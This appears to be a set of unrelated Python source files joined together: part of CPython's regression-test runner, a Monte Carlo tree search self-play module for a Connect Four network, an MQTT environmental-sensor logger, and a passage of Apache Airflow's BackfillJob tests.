obj._abc_cache.clear()
obj._abc_negative_cache.clear()
# Flush standard output, so that buffered data is sent to the OS and
# associated Python objects are reclaimed.
for stream in (sys.stdout, sys.stderr, sys.__stdout__, sys.__stderr__):
if stream is not None:
stream.flush()
# Clear assorted module caches.
_path_created.clear()
re.purge()
_strptime._regex_cache.clear()
urllib.parse.clear_cache()
urllib.request.urlcleanup()
linecache.clearcache()
mimetypes._default_mime_types()
filecmp._cache.clear()
struct._clearcache()
doctest.master = None
try:
import ctypes
except ImportError:
# Don't worry about resetting the cache if ctypes is not supported
pass
else:
ctypes._reset_cache()
# Collect cyclic trash and read memory statistics immediately after.
func1 = sys.getallocatedblocks
func2 = sys.gettotalrefcount
gc.collect()
return func1(), func2()
def warm_caches():
# char cache
s = bytes(range(256))
for i in range(256):
s[i:i+1]
# unicode cache
x = [chr(i) for i in range(256)]
# int cache
x = list(range(-5, 257))
def findtestdir(path=None):
return path or os.path.dirname(__file__) or os.curdir
def removepy(names):
if not names:
return
for idx, name in enumerate(names):
basename, ext = os.path.splitext(name)
if ext == '.py':
names[idx] = basename
def count(n, word):
if n == 1:
return "%d %s" % (n, word)
else:
return "%d %ss" % (n, word)
def printlist(x, width=70, indent=4):
"""Print the elements of iterable x to stdout.
Optional arg width (default 70) is the maximum line length.
Optional arg indent (default 4) is the number of blanks with which to
begin each line.
"""
from textwrap import fill
blanks = ' ' * indent
# Print the sorted list: 'x' may be a '--random' list or a set()
print(fill(' '.join(str(elt) for elt in sorted(x)), width,
initial_indent=blanks, subsequent_indent=blanks))
def main_in_temp_cwd():
"""Run main() in a temporary working directory."""
if sysconfig.is_python_build():
try:
os.mkdir(TEMPDIR)
except FileExistsError:
pass
# Define a writable temp dir that will be used as cwd while running
# the tests. The name of the dir includes the pid to allow parallel
# testing (see the -j option).
test_cwd = 'test_python_{}'.format(os.getpid())
test_cwd = os.path.join(TEMPDIR, test_cwd)
# Run the tests in a context manager that temporarily changes the CWD to a
# temporary and writable directory. If it's not possible to create or
# change the CWD, the original CWD will be used. The original CWD is
# available from support.SAVEDCWD.
with support.temp_cwd(test_cwd, quiet=True):
main()
if __name__ == '__main__':
# Remove regrtest.py's own directory from the module search path. Despite
# the elimination of implicit relative imports, this is still needed to
# ensure that submodules of the test package do not inappropriately appear
# as top-level modules even when people (or buildbots!) invoke regrtest.py
# directly instead of using the -m switch
mydir = os.path.abspath(os.path.normpath(os.path.dirname(sys.argv[0])))
i = len(sys.path)
while i >= 0:
i -= 1
if os.path.abspath(os.path.normpath(sys.path[i])) == mydir:
del sys.path[i]
# findtestdir() gets the dirname out of __file__, so we have to make it
# absolute before changing the working directory.
# For example __file__ may be relative when running trace or profile.
# See issue #9323.
__file__ = os.path.abspath(__file__)
# sanity check
assert __file__ == os.path.abspath(sys.argv[0])
main_in_temp_cwd()
|
MCTS_c4.py
|
#!/usr/bin/env python
import pickle
import os
import collections
import numpy as np
import math
import encoder_decoder_c4 as ed
from connect_board import board as c_board
import copy
import torch
import torch.multiprocessing as mp
from alpha_net_c4 import ConnectNet
import datetime
import logging
from tqdm import tqdm
logging.basicConfig(format='%(asctime)s [%(levelname)s]: %(message)s', \
datefmt='%m/%d/%Y %I:%M:%S %p', level=logging.INFO)
logger = logging.getLogger(__file__)
def save_as_pickle(filename, data):
completeName = os.path.join("./datasets/",\
filename)
with open(completeName, 'wb') as output:
pickle.dump(data, output)
def load_pickle(filename):
completeName = os.path.join("./datasets/",\
filename)
with open(completeName, 'rb') as pkl_file:
data = pickle.load(pkl_file)
return data
class UCTNode():
def __init__(self, game, move, parent=None):
self.game = game # state s
self.move = move # action index
self.is_expanded = False
self.parent = parent
self.children = {}
self.child_priors = np.zeros([7], dtype=np.float32)
self.child_total_value = np.zeros([7], dtype=np.float32)
self.child_number_visits = np.zeros([7], dtype=np.float32)
self.action_idxes = []
@property
def number_visits(self):
return self.parent.child_number_visits[self.move]
@number_visits.setter
def number_visits(self, value):
self.parent.child_number_visits[self.move] = value
@property
def total_value(self):
return self.parent.child_total_value[self.move]
@total_value.setter
def total_value(self, value):
self.parent.child_total_value[self.move] = value
def child_Q(self):
return self.child_total_value / (1 + self.child_number_visits)
def child_U(self):
return math.sqrt(self.number_visits) * (
abs(self.child_priors) / (1 + self.child_number_visits))
def best_child(self):
if self.action_idxes != []:
bestmove = self.child_Q() + self.child_U()
bestmove = self.action_idxes[np.argmax(bestmove[self.action_idxes])]
else:
bestmove = np.argmax(self.child_Q() + self.child_U())
return bestmove
def select_leaf(self):
current = self
while current.is_expanded:
best_move = current.best_child()
current = current.maybe_add_child(best_move)
return current
def add_dirichlet_noise(self,action_idxs,child_priors):
valid_child_priors = child_priors[action_idxs] # select only legal moves entries in child_priors array
valid_child_priors = 0.75*valid_child_priors + 0.25*np.random.dirichlet(np.zeros([len(valid_child_priors)], \
dtype=np.float32)+192)
child_priors[action_idxs] = valid_child_priors
return child_priors
def expand(self, child_priors):
self.is_expanded = True
action_idxs = self.game.actions()
c_p = child_priors
if action_idxs == []:
self.is_expanded = False
self.action_idxes = action_idxs
c_p[[i for i in range(len(child_priors)) if i not in action_idxs]] = 0.000000000 # mask all illegal actions
if self.parent.parent is None: # add dirichlet noise to child_priors in root node
c_p = self.add_dirichlet_noise(action_idxs,c_p)
self.child_priors = c_p
def decode_n_move_pieces(self,board,move):
board.drop_piece(move)
return board
def maybe_add_child(self, move):
if move not in self.children:
copy_board = copy.deepcopy(self.game) # make copy of board
copy_board = self.decode_n_move_pieces(copy_board,move)
self.children[move] = UCTNode(
copy_board, move, parent=self)
return self.children[move]
def backup(self, value_estimate: float):
current = self
while current.parent is not None:
current.number_visits += 1
if current.game.player == 1: # same as current.parent.game.player = 0
current.total_value += (1*value_estimate) # value estimate +1 = O wins
elif current.game.player == 0: # same as current.parent.game.player = 1
current.total_value += (-1*value_estimate)
current = current.parent
class DummyNode(object):
def __init__(self):
self.parent = None
self.child_total_value = collections.defaultdict(float)
self.child_number_visits = collections.defaultdict(float)
def UCT_search(game_state, num_reads,net,temp):
root = UCTNode(game_state, move=None, parent=DummyNode())
for _ in range(num_reads):
leaf = root.select_leaf()
encoded_s = ed.encode_board(leaf.game)
encoded_s = encoded_s.transpose(2,0,1)
encoded_s = torch.from_numpy(encoded_s).float().cuda()
child_priors, value_estimate = net(encoded_s)
child_priors = child_priors.detach().cpu().numpy().reshape(-1)
value_estimate = value_estimate.item()
if leaf.game.check_winner() == True or leaf.game.actions() == []: # if somebody won or draw
leaf.backup(value_estimate); continue
leaf.expand(child_priors) # need to make sure valid moves
leaf.backup(value_estimate)
return root
def do_decode_n_move_pieces(board,move):
board.drop_piece(move)
return board
def get_policy(root, temp=1):
#policy = np.zeros([7], dtype=np.float32)
#for idx in np.where(root.child_number_visits!=0)[0]:
# policy[idx] = ((root.child_number_visits[idx])**(1/temp))/sum(root.child_number_visits**(1/temp))
return ((root.child_number_visits)**(1/temp))/sum(root.child_number_visits**(1/temp))
def MCTS_self_play(connectnet, num_games, start_idx, cpu, args, iteration):
logger.info("[CPU: %d]: Starting MCTS self-play..." % cpu)
if not os.path.isdir("./datasets/iter_%d" % iteration):
if not os.path.isdir("datasets"):
os.mkdir("datasets")
os.mkdir("datasets/iter_%d" % iteration)
for idxx in tqdm(range(start_idx, num_games + start_idx)):
logger.info("[CPU: %d]: Game %d" % (cpu, idxx))
current_board = c_board()
checkmate = False
dataset = [] # to get state, policy, value for neural network training
states = []
value = 0
move_count = 0
while not checkmate and current_board.actions() != []:
t = args.temperature_MCTS if move_count < 11 else 0.1
states.append(copy.deepcopy(current_board.current_board))
board_state = copy.deepcopy(ed.encode_board(current_board))
root = UCT_search(current_board,777,connectnet,t)
policy = get_policy(root, t)
print("[CPU: %d]: Game %d POLICY:\n " % (cpu, idxx), policy)
current_board = do_decode_n_move_pieces(current_board,\
np.random.choice(np.array([0,1,2,3,4,5,6]), \
p = policy)) # decode move and move piece(s)
dataset.append([board_state,policy])
print("[Iteration: %d CPU: %d]: Game %d CURRENT BOARD:\n" % (iteration, cpu, idxx), current_board.current_board,current_board.player)
print(" ")
if current_board.check_winner() == True: # if somebody won
if current_board.player == 0: # black wins
value = -1
elif current_board.player == 1: # white wins
value = 1
checkmate = True
move_count += 1
dataset_p = []
for idx,data in enumerate(dataset):
s,p = data
if idx == 0:
dataset_p.append([s,p,0])
else:
dataset_p.append([s,p,value])
del dataset
save_as_pickle("iter_%d/" % iteration +\
"dataset_iter%d_cpu%i_%i_%s" % (iteration, cpu, idxx, datetime.datetime.today().strftime("%Y-%m-%d")), dataset_p)
def run_MCTS(args, start_idx=0, iteration=0):
net_to_play="%s_iter%d.pth.tar" % (args.neural_net_name, iteration)
net = ConnectNet()
if cuda := torch.cuda.is_available():
net.cuda()
if args.MCTS_num_processes > 1:
logger.info("Preparing model for multi-process MCTS...")
mp.set_start_method("spawn",force=True)
net.share_memory()
net.eval()
current_net_filename = os.path.join("./model_data/",\
net_to_play)
if os.path.isfile(current_net_filename):
checkpoint = torch.load(current_net_filename)
net.load_state_dict(checkpoint['state_dict'])
logger.info("Loaded %s model." % current_net_filename)
else:
torch.save({'state_dict': net.state_dict()}, os.path.join("./model_data/",\
net_to_play))
logger.info("Initialized model.")
processes = []
if args.MCTS_num_processes > mp.cpu_count():
num_processes = mp.cpu_count()
logger.info("Required number of processes exceed number of CPUs! Setting MCTS_num_processes to %d" % num_processes)
else:
num_processes = args.MCTS_num_processes
logger.info("Spawning %d processes..." % num_processes)
with torch.no_grad():
for i in range(num_processes):
p = mp.Process(target=MCTS_self_play, args=(net, args.num_games_per_MCTS_process, start_idx, i, args, iteration))
p.start()
processes.append(p)
for p in processes:
p.join()
logger.info("Finished multi-process MCTS!")
elif args.MCTS_num_processes == 1:
logger.info("Preparing model for MCTS...")
net.eval()
current_net_filename = os.path.join("./model_data/",\
net_to_play)
if os.path.isfile(current_net_filename):
checkpoint = torch.load(current_net_filename)
net.load_state_dict(checkpoint['state_dict'])
logger.info("Loaded %s model." % current_net_filename)
else:
torch.save({'state_dict': net.state_dict()}, os.path.join("./model_data/",\
net_to_play))
logger.info("Initialized model.")
with torch.no_grad():
MCTS_self_play(net, args.num_games_per_MCTS_process, start_idx, 0, args, iteration)
logger.info("Finished MCTS!")
|
logger.py
|
import collections, threading, traceback
import paho.mqtt.client as mqtt
try:
# Transitional fix for breaking change in LTR559
from ltr559 import LTR559
ltr559 = LTR559()
except ImportError:
import ltr559
from bme280 import BME280
from pms5003 import PMS5003
from enviroplus import gas
class EnvLogger:
def __init__(self, client_id, host, port, username, password, prefix, use_pms5003, num_samples):
self.bme280 = BME280()
self.prefix = prefix
self.connection_error = None
self.client = mqtt.Client(client_id=client_id)
self.client.on_connect = self.__on_connect
self.client.username_pw_set(username, password)
self.client.connect(host, port)
self.client.loop_start()
self.samples = collections.deque(maxlen=num_samples)
self.latest_pms_readings = {}
if use_pms5003:
self.pm_thread = threading.Thread(target=self.__read_pms_continuously)
self.pm_thread.daemon = True
self.pm_thread.start()
def __on_connect(self, client, userdata, flags, rc):
errors = {
1: "incorrect MQTT protocol version",
2: "invalid MQTT client identifier",
3: "server unavailable",
4: "bad username or password",
5: "connection refused"
}
if rc > 0:
self.connection_error = errors.get(rc, "unknown error")
def __read_pms_continuously(self):
"""Continuously reads from the PMS5003 sensor and stores the most recent values
in `self.latest_pms_readings` as they become available.
If the sensor is not polled continously then readings are buffered on the PMS5003,
and over time a significant delay is introduced between changes in PM levels and
the corresponding change in reported levels."""
pms = PMS5003()
while True:
try:
pm_data = pms.read()
self.latest_pms_readings = {
"particulate/1.0": pm_data.pm_ug_per_m3(1.0, atmospheric_environment=True),
"particulate/2.5": pm_data.pm_ug_per_m3(2.5, atmospheric_environment=True),
"particulate/10.0": pm_data.pm_ug_per_m3(None, atmospheric_environment=True),
}
except:
print("Failed to read from PMS5003. Resetting sensor.")
traceback.print_exc()
pms.reset()
def take_readings(self):
readings = {}
try:
readings["proximity"] = ltr559.get_proximity()
except OSError:
print("Error reading proximity sensor data")
try:
readings["lux"] = ltr559.get_lux()
except OSError:
print("Error reading lux sensor data")
try:
readings["temperature"] = self.bme280.get_temperature()
except OSError:
print("Error reading temperature sensor data")
try:
readings["pressure"] = self.bme280.get_pressure()
except OSError:
print("Error reading pressure sensor data")
try:
readings["humidity"] = self.bme280.get_humidity()
except OSError:
print("Error reading humidity sensor data")
try:
gas_data = gas.read_all()
readings["gas/oxidising"] = gas_data.oxidising
readings["gas/reducing"] = gas_data.reducing
readings["gas/nh3"] = gas_data.nh3
except OSError:
print("Error reading gas sensor data")
readings.update(self.latest_pms_readings)
return readings
def publish(self, topic, value):
topic = self.prefix.strip("/") + "/" + topic
self.client.publish(topic, str(value))
def update(self, publish_readings=True):
self.samples.append(self.take_readings())
if publish_readings:
for topic in self.samples[0].keys():
try:
value_sum = sum([d[topic] for d in self.samples])
value_avg = value_sum / len(self.samples)
self.publish(topic, value_avg)
except KeyError:
print(f"Error publishing data for {topic}")
def destroy(self):
self.client.disconnect()
self.client.loop_stop()
|
test_backfill_job.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import datetime
import json
import logging
import threading
from unittest.mock import patch
import pytest
from airflow import settings
from airflow.cli import cli_parser
from airflow.exceptions import (
AirflowException,
AirflowTaskTimeout,
BackfillUnfinished,
DagConcurrencyLimitReached,
NoAvailablePoolSlot,
TaskConcurrencyLimitReached,
)
from airflow.jobs.backfill_job import BackfillJob
from airflow.models import DagBag, Pool, TaskInstance as TI
from airflow.models.dagrun import DagRun
from airflow.models.taskinstance import TaskInstanceKey
from airflow.operators.dummy import DummyOperator
from airflow.utils import timezone
from airflow.utils.dates import days_ago
from airflow.utils.session import create_session
from airflow.utils.state import State
from airflow.utils.timeout import timeout
from airflow.utils.types import DagRunType
from tests.models import TEST_DAGS_FOLDER
from tests.test_utils.db import (
clear_db_dags,
clear_db_pools,
clear_db_runs,
clear_db_xcom,
set_default_pool_slots,
)
from tests.test_utils.mock_executor import MockExecutor
from tests.test_utils.timetables import cron_timetable
logger = logging.getLogger(__name__)
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
@pytest.fixture(scope="module")
def dag_bag():
return DagBag(include_examples=True)
class TestBackfillJob:
@staticmethod
def clean_db():
clear_db_dags()
clear_db_runs()
clear_db_xcom()
clear_db_pools()
@pytest.fixture(autouse=True)
def set_instance_attrs(self, dag_bag):
self.clean_db()
self.parser = cli_parser.get_parser()
self.dagbag = dag_bag
def _get_dummy_dag(
self,
dag_maker_fixture,
dag_id='test_dag',
pool=Pool.DEFAULT_POOL_NAME,
max_active_tis_per_dag=None,
task_id='op',
**kwargs,
):
with dag_maker_fixture(dag_id=dag_id, schedule_interval='@daily', **kwargs) as dag:
DummyOperator(task_id=task_id, pool=pool, max_active_tis_per_dag=max_active_tis_per_dag)
return dag
def _times_called_with(self, method, class_):
count = 0
for args in method.call_args_list:
if isinstance(args[0][0], class_):
count += 1
return count
def test_unfinished_dag_runs_set_to_failed(self, dag_maker):
dag = self._get_dummy_dag(dag_maker)
dag_run = dag_maker.create_dagrun(state=None)
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=8),
ignore_first_depends_on_past=True,
)
job._set_unfinished_dag_runs_to_failed([dag_run])
dag_run.refresh_from_db()
assert State.FAILED == dag_run.state
def test_dag_run_with_finished_tasks_set_to_success(self, dag_maker):
dag = self._get_dummy_dag(dag_maker)
dag_run = dag_maker.create_dagrun(state=None)
for ti in dag_run.get_task_instances():
ti.set_state(State.SUCCESS)
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=8),
ignore_first_depends_on_past=True,
)
job._set_unfinished_dag_runs_to_failed([dag_run])
dag_run.refresh_from_db()
assert State.SUCCESS == dag_run.state
@pytest.mark.xfail(condition=True, reason="This test is flaky")
@pytest.mark.backend("postgres", "mysql")
def test_trigger_controller_dag(self):
dag = self.dagbag.get_dag('example_trigger_controller_dag')
target_dag = self.dagbag.get_dag('example_trigger_target_dag')
target_dag.sync_to_db()
# dag_file_processor = DagFileProcessor(dag_ids=[], log=Mock())
task_instances_list = []
# task_instances_list = dag_file_processor._process_task_instances(
# target_dag,
# dag_runs=DagRun.find(dag_id='example_trigger_target_dag')
# )
assert not task_instances_list
job = BackfillJob(
dag=dag, start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_first_depends_on_past=True
)
job.run()
task_instances_list = []
# task_instances_list = dag_file_processor._process_task_instances(
# target_dag,
# dag_runs=DagRun.find(dag_id='example_trigger_target_dag')
# )
assert task_instances_list
@pytest.mark.backend("postgres", "mysql")
def test_backfill_multi_dates(self):
dag = self.dagbag.get_dag('miscellaneous_test_dag')
end_date = DEFAULT_DATE + datetime.timedelta(days=1)
executor = MockExecutor(parallelism=16)
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=end_date,
executor=executor,
ignore_first_depends_on_past=True,
)
job.run()
expected_execution_order = [
("runme_0", DEFAULT_DATE),
("runme_1", DEFAULT_DATE),
("runme_2", DEFAULT_DATE),
("runme_0", end_date),
("runme_1", end_date),
("runme_2", end_date),
("also_run_this", DEFAULT_DATE),
("also_run_this", end_date),
("run_after_loop", DEFAULT_DATE),
("run_after_loop", end_date),
("run_this_last", DEFAULT_DATE),
("run_this_last", end_date),
]
assert [
((dag.dag_id, task_id, f'backfill__{when.isoformat()}', 1, -1), (State.SUCCESS, None))
for (task_id, when) in expected_execution_order
] == executor.sorted_tasks
session = settings.Session()
drs = session.query(DagRun).filter(DagRun.dag_id == dag.dag_id).order_by(DagRun.execution_date).all()
assert drs[0].execution_date == DEFAULT_DATE
assert drs[0].state == State.SUCCESS
assert drs[1].execution_date == DEFAULT_DATE + datetime.timedelta(days=1)
assert drs[1].state == State.SUCCESS
dag.clear()
session.close()
@pytest.mark.backend("postgres", "mysql")
@pytest.mark.parametrize(
"dag_id, expected_execution_order",
[
[
"example_branch_operator",
(
"run_this_first",
"branching",
"branch_a",
"branch_b",
"branch_c",
"branch_d",
"follow_branch_a",
"follow_branch_b",
"follow_branch_c",
"follow_branch_d",
"join",
),
],
[
"miscellaneous_test_dag",
("runme_0", "runme_1", "runme_2", "also_run_this", "run_after_loop", "run_this_last"),
],
[
"example_skip_dag",
(
"always_true_1",
"always_true_2",
"skip_operator_1",
"skip_operator_2",
"all_success",
"one_success",
"final_1",
"final_2",
),
],
["latest_only", ("latest_only", "task1")],
],
)
def test_backfill_examples(self, dag_id, expected_execution_order):
"""
Test backfilling example dags
Try to backfill some of the example dags. Be careful, not all dags are suitable
for doing this. For example, a dag that sleeps forever, or does not have a
schedule won't work here since you simply can't backfill them.
"""
dag = self.dagbag.get_dag(dag_id)
logger.info('*** Running example DAG: %s', dag.dag_id)
executor = MockExecutor()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor,
ignore_first_depends_on_past=True,
)
job.run()
assert [
((dag_id, task_id, f'backfill__{DEFAULT_DATE.isoformat()}', 1, -1), (State.SUCCESS, None))
for task_id in expected_execution_order
] == executor.sorted_tasks
def test_backfill_conf(self, dag_maker):
dag = self._get_dummy_dag(dag_maker, dag_id='test_backfill_conf')
dag_maker.create_dagrun(state=None)
executor = MockExecutor()
conf_ = json.loads("""{"key": "value"}""")
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
conf=conf_,
)
job.run()
# We ignore the first dag_run created by fixture
dr = DagRun.find(
dag_id='test_backfill_conf', execution_start_date=DEFAULT_DATE + datetime.timedelta(days=1)
)
assert conf_ == dr[0].conf
@patch('airflow.jobs.backfill_job.BackfillJob.log')
def test_backfill_respect_max_active_tis_per_dag_limit(self, mock_log, dag_maker):
max_active_tis_per_dag = 2
dag = self._get_dummy_dag(
dag_maker,
dag_id='test_backfill_respect_max_active_tis_per_dag_limit',
max_active_tis_per_dag=max_active_tis_per_dag,
)
dag_maker.create_dagrun(state=None)
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=7),
)
job.run()
assert len(executor.history) > 0
task_concurrency_limit_reached_at_least_once = False
num_running_task_instances = 0
for running_task_instances in executor.history:
assert len(running_task_instances) <= max_active_tis_per_dag
num_running_task_instances += len(running_task_instances)
if len(running_task_instances) == max_active_tis_per_dag:
task_concurrency_limit_reached_at_least_once = True
assert 8 == num_running_task_instances
assert task_concurrency_limit_reached_at_least_once
times_dag_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
DagConcurrencyLimitReached,
)
times_pool_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
NoAvailablePoolSlot,
)
times_task_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
TaskConcurrencyLimitReached,
)
assert 0 == times_pool_limit_reached_in_debug
assert 0 == times_dag_concurrency_limit_reached_in_debug
assert times_task_concurrency_limit_reached_in_debug > 0
@patch('airflow.jobs.backfill_job.BackfillJob.log')
def test_backfill_respect_dag_concurrency_limit(self, mock_log, dag_maker):
dag = self._get_dummy_dag(dag_maker, dag_id='test_backfill_respect_concurrency_limit')
dag_maker.create_dagrun(state=None)
dag.max_active_tasks = 2
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=7),
)
job.run()
assert len(executor.history) > 0
concurrency_limit_reached_at_least_once = False
num_running_task_instances = 0
for running_task_instances in executor.history:
assert len(running_task_instances) <= dag.max_active_tasks
num_running_task_instances += len(running_task_instances)
if len(running_task_instances) == dag.max_active_tasks:
concurrency_limit_reached_at_least_once = True
assert 8 == num_running_task_instances
assert concurrency_limit_reached_at_least_once
times_dag_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
DagConcurrencyLimitReached,
)
times_pool_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
NoAvailablePoolSlot,
)
times_task_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
TaskConcurrencyLimitReached,
)
assert 0 == times_pool_limit_reached_in_debug
assert 0 == times_task_concurrency_limit_reached_in_debug
assert times_dag_concurrency_limit_reached_in_debug > 0
@patch('airflow.jobs.backfill_job.BackfillJob.log')
def test_backfill_respect_default_pool_limit(self, mock_log, dag_maker):
default_pool_slots = 2
set_default_pool_slots(default_pool_slots)
dag = self._get_dummy_dag(dag_maker, dag_id='test_backfill_with_no_pool_limit')
dag_maker.create_dagrun(state=None)
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=7),
)
job.run()
assert len(executor.history) > 0
default_pool_task_slot_count_reached_at_least_once = False
num_running_task_instances = 0
# if no pool is specified, the number of tasks running in
# parallel per backfill should be less than
# default_pool slots at any point of time.
for running_task_instances in executor.history:
assert len(running_task_instances) <= default_pool_slots
num_running_task_instances += len(running_task_instances)
if len(running_task_instances) == default_pool_slots:
default_pool_task_slot_count_reached_at_least_once = True
assert 8 == num_running_task_instances
assert default_pool_task_slot_count_reached_at_least_once
times_dag_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
DagConcurrencyLimitReached,
)
times_pool_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
NoAvailablePoolSlot,
)
times_task_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
TaskConcurrencyLimitReached,
)
assert 0 == times_dag_concurrency_limit_reached_in_debug
assert 0 == times_task_concurrency_limit_reached_in_debug
assert times_pool_limit_reached_in_debug > 0
def test_backfill_pool_not_found(self, dag_maker):
dag = self._get_dummy_dag(
dag_maker,
dag_id='test_backfill_pool_not_found',
pool='king_pool',
)
dag_maker.create_dagrun(state=None)
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=7),
)
try:
job.run()
except AirflowException:
return
@patch('airflow.jobs.backfill_job.BackfillJob.log')
def test_backfill_respect_pool_limit(self, mock_log, dag_maker):
session = settings.Session()
slots = 2
pool = Pool(
pool='pool_with_two_slots',
slots=slots,
)
session.add(pool)
session.commit()
dag = self._get_dummy_dag(
dag_maker,
dag_id='test_backfill_respect_pool_limit',
pool=pool.pool,
)
dag_maker.create_dagrun(state=None)
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=7),
)
job.run()
assert len(executor.history) > 0
pool_was_full_at_least_once = False
num_running_task_instances = 0
for running_task_instances in executor.history:
assert len(running_task_instances) <= slots
num_running_task_instances += len(running_task_instances)
if len(running_task_instances) == slots:
pool_was_full_at_least_once = True
assert 8 == num_running_task_instances
assert pool_was_full_at_least_once
times_dag_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
DagConcurrencyLimitReached,
)
times_pool_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
NoAvailablePoolSlot,
)
times_task_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
TaskConcurrencyLimitReached,
)
assert 0 == times_task_concurrency_limit_reached_in_debug
assert 0 == times_dag_concurrency_limit_reached_in_debug
assert times_pool_limit_reached_in_debug > 0
def test_backfill_run_rescheduled(self, dag_maker):
dag = self._get_dummy_dag(
dag_maker, dag_id="test_backfill_run_rescheduled", task_id="test_backfill_run_rescheduled_task-1"
)
dag_maker.create_dagrun(state=None)
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_run_rescheduled_task-1'), execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.UP_FOR_RESCHEDULE)
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True,
)
job.run()
ti = TI(task=dag.get_task('test_backfill_run_rescheduled_task-1'), execution_date=DEFAULT_DATE)
ti.refresh_from_db()
assert ti.state == State.SUCCESS
def test_backfill_override_conf(self, dag_maker):
dag = self._get_dummy_dag(
dag_maker, dag_id="test_backfill_override_conf", task_id="test_backfill_override_conf-1"
)
dr = dag_maker.create_dagrun(
state=None,
start_date=DEFAULT_DATE,
)
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
conf={"a": 1},
)
with patch.object(
job,
"_task_instances_for_dag_run",
wraps=job._task_instances_for_dag_run,
) as wrapped_task_instances_for_dag_run:
job.run()
dr = wrapped_task_instances_for_dag_run.call_args_list[0][0][0]
assert dr.conf == {"a": 1}
def test_backfill_skip_active_scheduled_dagrun(self, dag_maker, caplog):
dag = self._get_dummy_dag(
dag_maker,
dag_id="test_backfill_skip_active_scheduled_dagrun",
task_id="test_backfill_skip_active_scheduled_dagrun-1",
)
dag_maker.create_dagrun(
run_type=DagRunType.SCHEDULED,
state=State.RUNNING,
)
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
error_log_records = [record for record in caplog.records if record.levelname == "ERROR"]
assert "Backfill cannot be created for DagRun" in error_log_records[0].msg
ti = TI(
task=dag.get_task('test_backfill_skip_active_scheduled_dagrun-1'), execution_date=DEFAULT_DATE
)
ti.refresh_from_db()
# since DAG backfill is skipped, task state should be none
assert ti.state == State.NONE
def test_backfill_rerun_failed_tasks(self, dag_maker):
dag = self._get_dummy_dag(
dag_maker, dag_id="test_backfill_rerun_failed", task_id="test_backfill_rerun_failed_task-1"
)
dag_maker.create_dagrun(state=None)
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'), execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True,
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'), execution_date=DEFAULT_DATE)
ti.refresh_from_db()
assert ti.state == State.SUCCESS
def test_backfill_rerun_upstream_failed_tasks(self, dag_maker):
with dag_maker(dag_id='test_backfill_rerun_upstream_failed', schedule_interval='@daily') as dag:
op1 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-1')
op2 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-2')
op1.set_upstream(op2)
dag_maker.create_dagrun(state=None)
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
